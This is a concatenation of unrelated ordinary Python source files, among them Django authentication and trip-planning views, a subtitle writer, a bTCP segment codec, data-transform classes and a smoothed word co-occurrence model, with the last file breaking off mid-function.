# class AccountViewSet(viewsets.ModelViewSet):
# queryset = Account.objects.all()
# serializer_class = RegistrationSerializer
# def get_csrf(request):
# response = JsonResponse({"Info": "Success - Set CSRF cookie"})
# response["X-CSRFToken"] = get_token(request)
# return response
# @require_POST
# def loginView(request):
# data = json.loads(request.body)
# email = data.get("email")
# password = data.get("password")
# if email is None or password is None:
# return JsonResponse({"info": "Email and Password is needed"})
# user = authenticate(request, email=email, password=password)
# if user is None:
# return JsonResponse({"info": "User does not exist"}, status=400)
# login(request, user)
# return JsonResponse({"info": "User logged in successfully", "username": user.username})
# @login_required
# def logoutView(request):
# logout(request)
# return JsonResponse({"info": "User logged out successfully"})
# class WhoAmIView(APIView):
# authentication_classes = [SessionAuthentication]
# permission_classes = [IsAuthenticated]
# @staticmethod
# def get(request, format=None):
# if request.user.is_authenticated:
# return JsonResponse({"username": request.user.get_username()}) |
import c3srtconv
def write_single(line):
    """Render one subtitle as an SRT cue body: time range, then the text."""
    start = c3srtconv.time_to_srt_str(line.start_time)
    end = c3srtconv.time_to_srt_str(line.end_time)
    return "{} --> {}\n{}".format(start, end, line.text)
def write_multiple(lines):
    """Concatenate numbered (1-based) SRT cues for all given lines."""
    chunks = []
    for index, line in enumerate(lines, start=1):
        chunks.append(str(index) + '\n' + write_single(line) + '\n\n')
    return ''.join(chunks)
def has_tag(tag_id, content_item):
    """Return True if *content_item* carries a tag whose 'id' equals *tag_id*.

    Items without a 'tags' key are treated as untagged.
    """
    if 'tags' not in content_item:
        return False
    # Generator avoids materialising the id list and stops at the first match.
    return any(tag['id'] == tag_id for tag in content_item['tags'])
# coding=utf-8
__author__ = 'leo.he'
import logging

# Root logger. Without an explicit level it stays at the default WARNING
# and silently drops the DEBUG records the handlers below are configured
# to accept — that was the bug here.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)

logfile = 'app.log'

# File handler: everything from DEBUG up goes to app.log.
fh = logging.FileHandler(logfile)
fh.setLevel(logging.DEBUG)

# Console handler mirrors the same records to the terminal.
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)

formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s")
fh.setFormatter(formatter)
ch.setFormatter(formatter)

logger.addHandler(fh)
logger.addHandler(ch)
# Factory for bTCP segments
from btcp.segment_type import *
from btcp.constants import HEADER_SIZE, PAYLOAD_SIZE, SEGMENT_SIZE
from sys import byteorder
# Some indices
# (byte offsets of each field within the fixed-size segment header)
SEQUENCE_NUM = 0
ACK_NUM = 2
FLAGS = 4
WINDOW = 5
DATA_LENGTH = 6
CHECKSUM = 8
# Field sizes
# (width of each field in bytes; offsets + sizes describe a 10-byte header)
SEQUENCE_SIZE = 2
ACK_SIZE = 2
FLAGS_SIZE = 1
WINDOW_SIZE = 1
DATA_LENGTH_SIZE = 2
CHECKSUM_SIZE = 2
class bTCPSegment:
    """Builder/decoder for a single bTCP segment.

    Build with ``bTCPSegment().Factory().setFlag(...)....make()``; parse a
    received byte string with ``decode()``.  NOTE(review): the
    ``if not self.factory: pass`` guards below are no-ops — ``Factory()``
    must still be called before any setter, otherwise ``self.header`` does
    not exist and an AttributeError is raised.
    """

    def __init__(self):
        # Empty fields
        self.data = bytearray(0)
        self.flags = []
        self.flagint = 0
        self.seqnumber = 0
        self.acknumber = 0
        self.window = 0
        self.checksum = 0
        self.datalength = 0
        self.setchecksum = False
        self.checksumfunction = None
        self.factory = False

    def setFlag(self, type):
        """Set one flag bit in the header; returns self for chaining."""
        if not self.factory:
            pass
        # Throw an error if we did not get the proper type
        if not isinstance(type, SegmentType):
            raise TypeError("Type must be of type SegmentType")
        existing = self.header[FLAGS]
        mask = 1 << type.value
        new = (existing & ~mask) | mask
        self.header[FLAGS] = new
        self.flags.append(type)
        return self

    def setSequenceNumber(self, number):
        """Store the sequence number in the header; returns self."""
        if not self.factory:
            pass
        self.header[SEQUENCE_NUM:SEQUENCE_NUM + SEQUENCE_SIZE] = int.to_bytes(number, SEQUENCE_SIZE, byteorder)
        self.seqnumber = number
        return self

    def setAcknowledgementNumber(self, number):
        """Store the acknowledgement number in the header; returns self."""
        if not self.factory:
            pass
        self.acknumber = number
        self.header[ACK_NUM:ACK_NUM + ACK_SIZE] = int.to_bytes(number, ACK_SIZE, byteorder)
        return self

    def setWindow(self, window):
        """Store the advertised window byte in the header; returns self."""
        if not self.factory:
            pass
        self.window = window
        self.header[WINDOW] = window
        return self

    def setChecksum(self, checksum):
        """Register a checksum *function* applied over the segment in make()."""
        if not self.factory:
            pass
        self.checksumfunction = checksum
        self.setchecksum = True
        return self

    def setPayload(self, payload):
        """Attach the payload bytes and record their length in the header."""
        if not self.factory:
            pass
        self.data = bytearray(payload)
        datlen = len(self.data)
        if datlen > PAYLOAD_SIZE:
            raise AttributeError("Payload too large. Length was " + str(datlen) + ", but max length is " + str(PAYLOAD_SIZE))
        self.datalength = datlen
        self.header[DATA_LENGTH:DATA_LENGTH + DATA_LENGTH_SIZE] = int.to_bytes(datlen, DATA_LENGTH_SIZE, byteorder)
        return self

    def make(self):
        """Assemble header + payload; fills in the checksum if one was set."""
        if not self.factory:
            pass
        segment = self.header + self.data
        if self.setchecksum:
            # Checksum is computed over the segment with a zeroed checksum
            # field, then written back into the header.
            self.checksum = self.checksumfunction(segment)
            self.header[CHECKSUM:CHECKSUM + CHECKSUM_SIZE] = int.to_bytes(self.checksum, CHECKSUM_SIZE, byteorder)
            segment = self.header + self.data
        # Sanity check
        if len(segment) > SEGMENT_SIZE:
            # was: "... max lenght is " + SEGMENT_SIZE -- concatenating the
            # int raised TypeError instead of the intended AttributeError
            raise AttributeError(
                "Segment too large. Length was " + str(len(segment)) + ", but max length is " + str(SEGMENT_SIZE))
        return segment

    def Factory(self):
        """Initialise empty header/payload buffers and enable the setters."""
        # Init empty array for header
        self.data = bytearray(0)
        self.header = bytearray(HEADER_SIZE)
        self.factory = True
        return self

    def decode(self, rawSegment):
        """Populate all fields from a raw segment (10-byte header + payload).

        NOTE(review): the payload is stored as a decoded str here, whereas
        the builder keeps bytearray — confirm callers expect that.
        """
        header = rawSegment[0:10]
        # SEQUENCE_NUM is 0, so [0:SEQUENCE_SIZE] equals the usual
        # offset+size slice used for the other fields.
        seqnum = header[SEQUENCE_NUM:SEQUENCE_SIZE]
        self.seqnumber = int.from_bytes(seqnum, byteorder)
        acknum = header[ACK_NUM:ACK_NUM+ACK_SIZE]
        self.acknumber = int.from_bytes(acknum, byteorder)
        flags = header[FLAGS:FLAGS+FLAGS_SIZE]
        self.flags, self.flagint = self.decodeFlags(flags)
        window_ = header[WINDOW:WINDOW+WINDOW_SIZE]
        self.window = int.from_bytes(window_, byteorder)
        datlen = header[DATA_LENGTH:DATA_LENGTH+DATA_LENGTH_SIZE]
        self.datalength = int.from_bytes(datlen, byteorder)
        checksum = header[CHECKSUM:CHECKSUM+CHECKSUM_SIZE]
        self.checksum = int.from_bytes(checksum, byteorder)
        self.data = rawSegment[10:(10 + self.datalength)].decode()

    def decodeFlags(self, flags):
        """Return ([SegmentType,...], raw int) decoded from the flag byte.

        NOTE(review): masks 2/8/32 assume SegmentType.ACK/SYN/FIN have
        enum values 1/3/5 (matching setFlag's ``1 << value``) — confirm
        against the segment_type module.
        """
        number = int.from_bytes(flags, byteorder)
        flags = []
        if number & 2 != 0:
            flags.append(SegmentType.ACK)
        if number & 8 != 0:
            flags.append(SegmentType.SYN)
        if number & 32 != 0:
            flags.append(SegmentType.FIN)
        return flags, number
|
"""templer.django_project_app"""
import os
from templer.core.vars import StringVar
from templer.core.vars import BooleanVar
from templer.core.base import BaseTemplate
from templer.core.structures import Structure
HELP_TEXT = """
This creates a basic skeleton for a Django application within a project.
"""
POST_RUN_MESSAGE = """
Now you can install your application into your project by adding these lines.
in %(project_root_path)surls.py:
url(r'^%(egg)s/', include('%(project_root_module)s%(egg)s.urls')),
in %(project_root_path)ssettings.py:
INSTALLED_APPS = (
...
'%(project_root_module)s%(egg)s',
...)
"""
MODEL_VAR = StringVar(
'model',
title='Model name',
description='Default name of the model',
default='Model',
help='The name of the Model should be in singular form '
'and in CapitalizedWords format.'
)
MANAGEMENT_COMMAND_VAR = BooleanVar(
'add_management_command',
title='Add management command',
description='Should the application have management command ?',
default=False,
structures={'False': None, 'True': 'management_command'},
help='This will create the structure for adding management '
'commands to your application.'
)
class ManagementCommandStructure(Structure):
    """Structure providing the skeleton files for a Django management command."""
    _structure_dir = 'structures/management_command'
class DjangoProjectApp(BaseTemplate):
    """Templer template: a Django application skeleton inside a project.

    NOTE: this is Python 2 code (``print`` statement in post()).
    """
    _template_dir = 'templates/django_project_app'
    summary = 'A basic Django project application skeleton within a project'
    help = HELP_TEXT
    category = 'Django'
    use_cheetah = True
    vars = [MODEL_VAR, MANAGEMENT_COMMAND_VAR]

    def pre(self, command, output_dir, vars):
        """Derive project-root paths from the current directory before rendering."""
        super(DjangoProjectApp, self).pre(
            command, output_dir, vars)
        # The enclosing project is assumed to be the current directory's name.
        vars['project_root'] = os.path.split(os.getcwd())[-1]
        vars['project_root_path'] = '%s/' % vars['project_root']
        vars['project_root_module'] = '%s.' % vars['project_root']
        vars['model_lower'] = vars['model'].lower()

    def post(self, command, output_dir, vars):
        """Print installation instructions after the skeleton is generated."""
        # Don't set the message to self.post_run_msg because the output
        # is really ugly. Simply rename the next assignment to change
        # this behavior.
        self.post_run_message = POST_RUN_MESSAGE % vars
        print self.post_run_message
        super(DjangoProjectApp, self).post(
            command, output_dir, vars)
class DjangoApp(DjangoProjectApp):
    """Standalone variant: same skeleton, but with no enclosing project,
    so all project-root variables are blanked out."""
    summary = 'A basic Django project application skeleton'

    def pre(self, command, output_dir, vars):
        super(DjangoApp, self).pre(
            command, output_dir, vars)
        # Override the values derived from the cwd in the parent class.
        vars['project_root'] = ''
        vars['project_root_path'] = ''
        vars['project_root_module'] = ''
|
from PIL import Image
import sys
# Image path is taken from the first command-line argument.
im = Image.open(sys.argv[1])
print('Picture format: ' + im.format)
print('Picture Matrix size: ' + str(im.size))
print('Picture mode: ' + im.mode)
# PIL's size is (width, height); this script calls width "row" and
# height "column".
row = im.size[0]
column = im.size[1]
print('Picture row: ' + str(row))
print('Picture column: ' + str(column))
def print_color_value():
    """Print the image as a brace-wrapped table of 0xRRGGBB words,
    one line per image row, matching C array initialiser syntax.

    Uses the module-level ``im``, ``row`` and ``column`` globals.
    """
    print('{')
    for x in range(row):
        for y in range(column):
            pixel = im.getpixel((x, y))
            packed = (pixel[0] << 16) + (pixel[1] << 8) + pixel[2]
            word = '0x%x' % packed
            # Branch order matters: a single-column image takes the
            # first branch, just like the original.
            if y == 0:
                print('\t{' + word, end=', ')
            elif y == (column - 1):
                print(word, end='},')
            else:
                print(word, end=', ')
        print()
    print('}')
def image_zoom():
    # Currently just dumps the colour table; no zooming is implemented yet.
    print_color_value()
|
from django.shortcuts import render, redirect
from buddy_app.models import*
from django.contrib import messages
import bcrypt
def index(request):
    """Landing page with the registration / login forms."""
    return render(request, 'welcome.html')
def create_user(request):
    """Validate and register a new user, then start their session."""
    if request.method != "POST":
        return redirect("/")
    errors = User.objects.registration_validator(request.POST)
    if errors:
        for message in errors.values():
            messages.error(request, message)
        return redirect('/')
    # Hash the password before it ever touches the database.
    hashed = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()
    user = User.objects.create(
        first_name=request.POST['first_name'],
        last_name=request.POST['last_name'],
        email=request.POST['email'],
        password=hashed,
    )
    request.session['logged_user'] = user.id
    return redirect('/user/hello')
# localhost:8000/dashboard
def login(request):
    """Authenticate by email/password; on success store the session user."""
    if request.method == "POST":
        matches = User.objects.filter(email=request.POST['email'])
        if matches:
            candidate = matches[0]
            if bcrypt.checkpw(request.POST['password'].encode(), candidate.password.encode()):
                request.session['logged_user'] = candidate.id
                return redirect('/user/hello')
        # Same message for unknown email and wrong password on purpose.
        messages.error(request, "Email or password are incorrect.")
    return redirect("/")
def dashboard(request):
    """Main page: the logged-in user plus every trip, newest first."""
    current_user = User.objects.get(id=request.session['logged_user'])
    trips = Trip.objects.all().order_by('-created_at')
    return render(request, 'hello.html', {
        'logged_user': current_user,
        'all_trips': trips,
    })
def create_trip(request):
    """Validate the POSTed trip data and create a trip for the session user."""
    if request.method == 'POST':
        errors = Trip.objects.basic_validator(request.POST)
        if errors:
            for message in errors.values():
                messages.error(request, message)
            # Back to the form so the user can correct the input.
            return redirect(f'/user/trip')
        else:
            owner = User.objects.get(id=request.session['logged_user'])
            Trip.objects.create(
                destination=request.POST['destination'],
                start_date=request.POST['start_date'],
                end_date=request.POST['end_date'],
                plan=request.POST['plan'],
                user_trip=owner,
            )
    return redirect(f'/user/hello')
def trip(request):
    """Render the new-trip form with the current user and all trips."""
    page_data = {
        'logged_user': User.objects.get(id=request.session['logged_user']),
        'all_trips': Trip.objects.all(),
    }
    return render(request, 'create_trip.html', page_data)
def edit_trip(request, trip_id):
    """Show the edit form pre-filled with one trip's data."""
    return render(request, 'edit_trip.html', {
        'logged_user': User.objects.get(id=request.session['logged_user']),
        'trip': Trip.objects.get(id=trip_id),
    })
def updated_trip(request, trip_id):
    """Apply a POSTed edit to an existing trip after validation."""
    if request.method == 'POST':
        errors = Trip.objects.basic_validator(request.POST)
        if errors:
            for message in errors.values():
                messages.error(request, message)
            return redirect(f'/trip/{trip_id}/edit')
        else:
            edited = Trip.objects.get(id=trip_id)
            edited.destination = request.POST['destination']
            edited.start_date = request.POST['start_date']
            edited.end_date = request.POST['end_date']
            edited.plan = request.POST['plan']
            edited.save()
            messages.success(request, "Trip successfully updated")
    return redirect(f'/user/hello')
def view_trip(request, trip_id):
    """Detail page for a single trip."""
    return render(request, 'view_trip.html', {
        'logged_user': User.objects.get(id=request.session['logged_user']),
        'trip': Trip.objects.get(id=trip_id),
    })
def delete_trip(request, trip_id):
    """Delete a trip; anonymous visitors are bounced back to the login page.

    Fixes two defects: ``messages.error(reques, ...)`` raised a NameError
    (typo), and the function fell through and deleted the trip even when the
    visitor was not logged in.
    """
    if 'logged_user' not in request.session:
        messages.error(request, "Please register or log in first")
        return redirect('/')
    trip = Trip.objects.get(id=trip_id)
    trip.delete()
    return redirect(f'/user/hello')
def logout(request):
    """Drop the whole session and return to the welcome page."""
    request.session.flush()
    return redirect('/')
# Create your views here.
|
import sys
from .. import Container, DataAttribute, Attribute, Attributes
from ..exc import Concern
class BaseTransform(Container):
    """The core implementation of common Transform shared routines.
    Most transformer implementations should subclass Transform or SplitTransform.
    """

    def foreign(self, value, context=None):
        """Convert a value from Python to a foreign-acceptable type, i.e. web-safe, JSON-safe, etc."""
        return value

    def native(self, value, context=None):
        """Convert a value from a foreign type (i.e. web-safe) to Python-native."""
        return value

    def loads(self, value, context=None):
        """Attempt to load a string-based value into the native representation.
        Empty strings are treated as ``None`` values.
        """
        if value == '' or (hasattr(value, 'strip') and value.strip() == ''):
            return None
        # Forward the context; it was previously dropped here, unlike every
        # other context-aware hook in this class.
        return self.native(value, context)

    def dumps(self, value, context=None):
        """Attempt to transform a native value into a string-based representation.
        ``None`` values are represented as an empty string.
        """
        if value is None:
            return ''
        return str(self.foreign(value, context))

    def load(self, fh, context=None):
        """Attempt to transform a string-based value read from a file-like object into the native representation."""
        return self.loads(fh.read(), context)

    def dump(self, fh, value, context=None):
        """Attempt to transform and write a string-based foreign value to the given file-like object.
        Returns the length written.
        """
        value = self.dumps(value, context)
        fh.write(value)
        return len(value)
class Transform(BaseTransform):
    """The base transformer implementation.

    Like validation, may raise Concern on invalid input data.  A
    transformer's role, though, is best-effort conversion of values to and
    from a foreign format.  Attributes:

    * ``none``     Treat empty strings as ``None`` on the way in. (Default: ``False``)
    * ``encoding`` Encoding used for bytes-to-str decoding; ``None`` disables it. (Default: ``utf-8``)
    * ``strip``    Strip leading/trailing whitespace from string values. (Default: ``True``)

    Transformers should operate bi-directionally wherever possible.
    """

    none = Attribute(default=False)
    encoding = Attribute(default='utf-8')
    strip = Attribute(default=True)

    def native(self, value, context=None):
        """Convert a value from a foreign type (i.e. web-safe) to Python-native."""
        if self.strip and hasattr(value, 'strip'):
            value = value.strip()
        if self.none and value == '':
            return None
        if self.encoding and isinstance(value, bytes):
            value = value.decode(self.encoding)
        return value
class IngressTransform(Transform):
    """The simplest transformation: typecasting incoming data.

    The ``ingress`` callable converts foreign values to native; native
    values are assumed acceptable as foreign ones.  ``None`` passes through
    untouched in all cases (pair with the Required validator if ``None`` is
    not actually acceptable).  Example::

        integer = IngressTransform(ingress=int)

    Useful with SplitTransform to build simple custom (de)serializers.
    """

    ingress = DataAttribute()

    def native(self, value, context=None):
        """Convert a value from a foreign type (i.e. web-safe) to Python-native."""
        value = super().native(value, context)
        if value is None:
            return
        try:
            return self.ingress(value)
        except Exception as e:
            raise Concern("Unable to transform incoming value: {0}", str(e))
class EgressTransform(Transform):
    """As per IngressTransform, but for outgoing data: the ``egress``
    callable converts native values to their foreign form."""

    egress = DataAttribute()

    def foreign(self, value, context=None):
        outbound = super().foreign(value, context)
        try:
            return self.egress(outbound)
        except Exception as e:
            raise Concern("Unable to transform outgoing value: {0}", str(e))
class CallbackTransform(IngressTransform, EgressTransform):
    """A convenient combination of IngressTransform and EgressTransform.

    Both ``ingress`` and ``egress`` callbacks _must_ be supplied for the
    combined transformer to function.
    """
    pass
class SplitTransform(BaseTransform):
    """Splits read and write behaviours between two transformers.

    Both ``reader`` and ``writer`` transformer instances are required to
    function; their absence is reported as a Concern at construction time.
    """
    reader = DataAttribute()  # handles all inbound calls (native/loads/load)
    writer = DataAttribute()  # handles all outbound calls (foreign/dumps/dump)

    def __init__(self, *args, **kw):
        super().__init__(*args, **kw)
        # Touch both attributes so a missing one fails fast here rather
        # than at first use.
        try:
            self.reader
            self.writer
        except AttributeError:
            raise Concern("SplitTransform instances must define both reader and writer child transformers.")

    # Reader Methods
    def native(self, value, context=None):
        return self.reader.native(value, context)

    def loads(self, value, context=None):
        return self.reader.loads(value, context)

    def load(self, fh, context=None):
        return self.reader.load(fh, context)

    # Writer Methods
    def foreign(self, value, context=None):
        return self.writer.foreign(value, context)

    def dumps(self, value, context=None):
        return self.writer.dumps(value, context)

    def dump(self, fh, value, context=None):
        return self.writer.dump(fh, value, context)
|
import pickle
from utilities import *
import numpy as np
import math
import pickle
from wordTypeCheckFunction import *
from collections import defaultdict
import pprint
def sigmoid(x):
    """Numerically stable logistic function 1 / (1 + e^-x).

    The two-branch form avoids OverflowError from math.exp(-x) for large
    negative x; exp(x) underflows safely to 0.0 instead.
    """
    if x >= 0:
        return 1 / (1 + math.exp(-x))
    ex = math.exp(x)
    return ex / (1 + ex)
"""
These models are count based probabilistic model
created using the DCS_Pick corpus
-----------------------------------
Uses KN smoothing
"""
class ProbModels():
    def __init__(self, **kwargs):
        """Wire up all pre-computed count tables used by the smoothed models.

        Expected kwargs (all built from the DCS_Pick corpus):
          fullCo_oc_mat / unigram_counts              -- word-to-word co-occurrence
          cng2cngFullMat / cng2index_dict             -- type-to-type (CNG) matrix
          v2c_fullMat                                 -- verb-to-CNG counts
          w2w_samecng_fullmat / samecng_unigram_counts -- same-CNG word pairs
        Missing keys default to None via the defaultdict wrapper below.
        """
        kwargs = defaultdict(lambda: None, kwargs)
        """WORD2WORD CO-OCCURENCE DATA"""
        fullCo_oc_mat = kwargs['fullCo_oc_mat']
        unigram_counts = kwargs['unigram_counts']
        # Number of distinct co-occurrence partners per word.
        context_count = defaultdict(int)
        for word in fullCo_oc_mat.keys():
            context_count[word] = len(fullCo_oc_mat[word])
        # Each bigram is repeated; a-b is same as b-a
        # NOTE(review): unlike the samecng totals below, this sum is NOT
        # halved despite the comment — confirm whether /2 was intended.
        total_context = int(sum(context_count.values()))
        total_co_oc = sum(
            [sum(fullCo_oc_mat[word].values()) for word in fullCo_oc_mat.keys()])
        # Total co-occurrence mass per word (KN denominator).
        co_oc_count = defaultdict(int)
        for w in fullCo_oc_mat.keys():
            co_oc_count[w] = sum(fullCo_oc_mat[w].values())
        self.fullCo_oc_mat = fullCo_oc_mat
        self.unigram_counts = unigram_counts
        self.context_count = context_count
        self.total_context = total_context
        self.total_co_oc = total_co_oc
        self.co_oc_count = co_oc_count
        """TYPE2TYPE DATA"""
        cng2cngFullMat = kwargs['cng2cngFullMat']
        cng2index_dict = kwargs['cng2index_dict']
        t2t_context_count = np.sum(cng2cngFullMat > 0, axis = 1) # Row-wise sum
        t2t_total_co_oc = int(np.sum(cng2cngFullMat))
        t2t_total_contexts = np.sum(t2t_context_count)
        t2t_co_oc_count = np.sum(cng2cngFullMat, axis = 1) # Row-wise sum
        self.cng2cngFullMat = cng2cngFullMat
        self.cng2index_dict = cng2index_dict
        self.t2t_context_count = t2t_context_count
        self.t2t_total_contexts = t2t_total_contexts
        self.t2t_total_co_oc = t2t_total_co_oc
        self.t2t_co_oc_count = t2t_co_oc_count
        """VERB2TYPE DATA"""
        self.v2c_fullMat = kwargs['v2c_fullMat']
        # Membership flag per known verb (used as a fast lookup set).
        self.verbsList = defaultdict(int)
        for v in self.v2c_fullMat.keys():
            self.verbsList[v] = 1
        """W2W_SAME_CNG DATA"""
        w2w_samecng_fullmat = kwargs['w2w_samecng_fullmat']
        samecng_unigram_counts = kwargs['samecng_unigram_counts']
        samecng_context_count = defaultdict(int)
        for word in w2w_samecng_fullmat.keys():
            samecng_context_count[word] = len(w2w_samecng_fullmat[word])
        # Each bigram is repeated; a-b is same as b-a
        samecng_total_context = int(sum(samecng_context_count.values())/2)
        samecng_total_co_oc = sum(
            [sum(w2w_samecng_fullmat[word].values()) for word in w2w_samecng_fullmat.keys()])
        samecng_co_oc_count = defaultdict(int)
        for w in w2w_samecng_fullmat.keys():
            samecng_co_oc_count[w] = sum(w2w_samecng_fullmat[w].values())
        self.w2w_samecng_fullmat = w2w_samecng_fullmat
        self.samecng_unigram_counts = samecng_unigram_counts
        self.samecng_context_count = samecng_context_count
        self.samecng_total_context = samecng_total_context
        self.samecng_total_co_oc = samecng_total_co_oc
        self.samecng_co_oc_count = samecng_co_oc_count
        return
    def RemoveCompetingEdges(self, TransitionMat, tuplesMain, chunkDict):
        """Zero out transition edges between mutually exclusive analyses.

        Two kinds of edges are removed, in place, from TransitionMat:
        (1) edges between alternative analyses at the same chunk position,
        and (2) edges between analyses at different positions that cannot
        co-exist under sandhi (via CanCoExist_sandhi).

        Assumes each tuple is (node_id, surface_form, ...) — node id at
        index 0 and the word form used for the sandhi check at index 1;
        TODO confirm the tuple layout against the producer of tuplesMain.
        """
        # Node ids are dense; the highest id in the last tuple set + 1
        # gives the node count.
        lastTuple = tuplesMain[len(tuplesMain) - 1]
        nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
        wordList = ['']*nodeCount
        for i in range(0, len(tuplesMain)):
            # print(tuplesMain[i])
            for tup in tuplesMain[i]:
                wordList[tup[0]] = tup[1]
        # REMOVE EDGES FROM COMPETETING NODES
        # IN THE SAME CHUNK
        # cDict2 maps chunk-id -> position -> flat list of node ids.
        cDict2 = {}
        for cid in chunkDict.keys():
            chunk = chunkDict[cid]
            cDict2[cid] = {}
            for pos in chunk.keys():
                wids = []
                for zz in chunk[pos]:
                    for tup in tuplesMain[zz]:
                        wids.append(tup[0])
                cDict2[cid][pos]=wids
        for cid in chunkDict.keys():
            chunk = chunkDict[cid]
            for pos in chunk.keys():
                wids = chunk[pos]
                # Remove edge b/w nodes at same location
                for u in range(len(wids) - 1):
                    for v in range(u + 1, len(wids)):
                        # print('Remvoe b/w', wordList[wids[u]], wordList[wids[v]])
                        TransitionMat[wids[u], wids[v]] = 0
                        TransitionMat[wids[v], wids[u]] = 0
                # Remove edge b/w competing nodes from diff location
                for _pos in chunk.keys():
                    wids2 = chunk[_pos]
                    if(pos < _pos):
                        for wi1 in wids:
                            for wi2 in wids2:
                                name1 = wordList[wi1]
                                name2 = wordList[wi2]
                                # '''
                                # # FIXME:
                                # '''
                                # try:
                                # Earlier position's form goes first in the
                                # sandhi compatibility check.
                                if not CanCoExist_sandhi(pos, _pos, name1, name2):
                                    # print('Remvoe b/w', name1, name2)
                                    TransitionMat[wi1, wi2] = 0
                                # except IndexError:
                                #     pass
                    elif(_pos < pos):
                        for wi1 in wids:
                            for wi2 in wids2:
                                name1 = wordList[wi1]
                                name2 = wordList[wi2]
                                # try:
                                if not CanCoExist_sandhi(_pos, pos, name2, name1):
                                    # print('Remvoe b/w', name2, name1)
                                    TransitionMat[wi1, wi2] = 0
                                # except IndexError:
                                #     pass
    def get_cng2cng_mat(self, tuplesMain, chunkDict, kn_smooth = True):
        """Build the row-stochastic CNG-to-CNG transition matrix.

        With kn_smooth=True every cross-set pair is scored with the
        Kneser-Ney estimate (kn_cng2cng) and competing edges are pruned;
        otherwise raw matrix entries are used.  The CNG label is read
        from tuple index 3.
        """
        # pprint.pprint(tuplesMain)
        # pprint.pprint(chunkDict)
        lastTuple = tuplesMain[len(tuplesMain) - 1]
        nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
        TransitionMat = np.zeros((nodeCount, nodeCount))
        if kn_smooth:
            # Score every ordered pair of nodes drawn from different
            # tuple sets; same-set pairs stay zero.
            for i in range(0, len(tuplesMain) - 1):
                for j in range(i + 1, len(tuplesMain)):
                    tSet1 = tuplesMain[i]
                    tSet2 = tuplesMain[j]
                    for tup1 in tSet1:
                        for tup2 in tSet2:
                            row = tup1[0]
                            col = tup2[0]
                            # row != col, always
                            TransitionMat[row][col] = self.kn_cng2cng(tup1[3], tup2[3])
                            TransitionMat[col][row] = self.kn_cng2cng(tup2[3], tup1[3])
            self.RemoveCompetingEdges(TransitionMat, tuplesMain, chunkDict)
            # Normalise each row to a probability distribution.
            for row in range(nodeCount):
                row_sum = np.sum(TransitionMat[row, :])
                if(row_sum == 0):
                    print("Report ROW SUM ZERO CNG2CNG")
                else:
                    TransitionMat[row, :] /= row_sum
                    TransitionMat[row, row] = 0
        else:
            # FIXME: DOESN'T SUPPORT TUPLESMAIN
            cng2cngFullMat = self.cng2cngFullMat
            cng2index_dict = self.cng2index_dict
            cngList = []
            for tupleSet in tuplesMain:
                for tup in tupleSet:
                    cngList.append(tup[3])
            # Map CNG labels to matrix indices; unknown labels become None.
            cngIndexList = []
            for cng in cngList:
                try:
                    ci = cng2index_dict[str(cng)]
                    cngIndexList.append(ci)
                except:
                    cngIndexList.append(None)
            for row in range(nodeCount):
                for col in range(nodeCount):
                    if row != col:
                        try:
                            # print(cngIndexList[row])
                            TransitionMat[row][col] = cng2cngFullMat[cngIndexList[row],cngIndexList[col]]
                        except KeyError:
                            TransitionMat[row][col] = 0 #WHAT TO DO HERE??
                    else:
                        TransitionMat[row][col] = 0
                row_sum = np.sum(TransitionMat[row, :])
                if(row_sum > 0):
                    TransitionMat[row, :] /= row_sum
                else:
                    # All-zero row: fall back to a uniform distribution.
                    TransitionMat[row, :] = 1/(nodeCount - 1)
                    pass
                TransitionMat[row, row] = 0
                # print((TransitionMat[row, :]))
        # MakeRowStochastic(TransitionMat)
        return TransitionMat
    def get_w2w_mat(self, tuplesMain, chunkDict, kn_smooth = True):
        """Build the row-stochastic word-to-word transition matrix.

        Same shape and flow as get_cng2cng_mat, but scored with
        kn_word2word on the word form found at tuple index 2.
        """
        lastTuple = tuplesMain[len(tuplesMain) - 1]
        nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
        TransitionMat = np.zeros((nodeCount, nodeCount))
        if kn_smooth:
            # Score every ordered pair of nodes from different tuple sets.
            for i in range(0, len(tuplesMain) - 1):
                for j in range(i + 1, len(tuplesMain)):
                    tSet1 = tuplesMain[i]
                    tSet2 = tuplesMain[j]
                    for tup1 in tSet1:
                        for tup2 in tSet2:
                            row = tup1[0]
                            col = tup2[0]
                            # row != col, always
                            TransitionMat[row][col] = self.kn_word2word(tup1[2], tup2[2])
                            TransitionMat[col][row] = self.kn_word2word(tup2[2], tup1[2])
            self.RemoveCompetingEdges(TransitionMat, tuplesMain, chunkDict)
            # Normalise each row to a probability distribution.
            for row in range(nodeCount):
                row_sum = np.sum(TransitionMat[row, :])
                if(row_sum == 0):
                    print("Report ROW SUM ZERO W2W", row)
                else:
                    TransitionMat[row, :] /= row_sum
                    TransitionMat[row, row] = 0
        else:
            # FIXME:
            wordList = []
            for tupleSet in tuplesMain:
                for tup in tupleSet:
                    wordList.append(tup[2])
            for row in range(nodeCount):
                for col in range(nodeCount):
                    if row != col:
                        try:
                            TransitionMat[row][col] = self.fullCo_oc_mat[wordList[row]][wordList[col]]
                        except KeyError:
                            TransitionMat[row][col] = 0
                    else:
                        TransitionMat[row][col] = 0
                row_sum = np.sum(TransitionMat[row, :])
                if row_sum > 0:
                    TransitionMat[row, :] /= row_sum
                else:
                    # All-zero row: fall back to a uniform distribution.
                    TransitionMat[row, :] = 1/(nodeCount - 1)
                TransitionMat[row, row] = 0
                # print((TransitionMat[row, :]))
        # MakeRowStochastic(TransitionMat)
        return TransitionMat
def get_w2w_samecng_mat(self, tuplesMain, chunkDict, kn_smooth = True):
lastTuple = tuplesMain[len(tuplesMain) - 1]
nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
TransitionMat = np.zeros((nodeCount, nodeCount))
if kn_smooth:
for i in range(0, len(tuplesMain) - 1):
for j in range(i + 1, len(tuplesMain)):
tSet1 = tuplesMain[i]
tSet2 = tuplesMain[j]
for tup1 in tSet1:
for tup2 in tSet2:
row = tup1[0]
col = tup2[0]
# row != col, always
TransitionMat[row][col] = self.kn_word2word_samecng(tup1[2], tup2[2])
TransitionMat[col][row] = self.kn_word2word_samecng(tup2[2], tup1[2])
self.RemoveCompetingEdges(TransitionMat, tuplesMain, chunkDict)
for row in range(nodeCount):
row_sum = np.sum(TransitionMat[row, :])
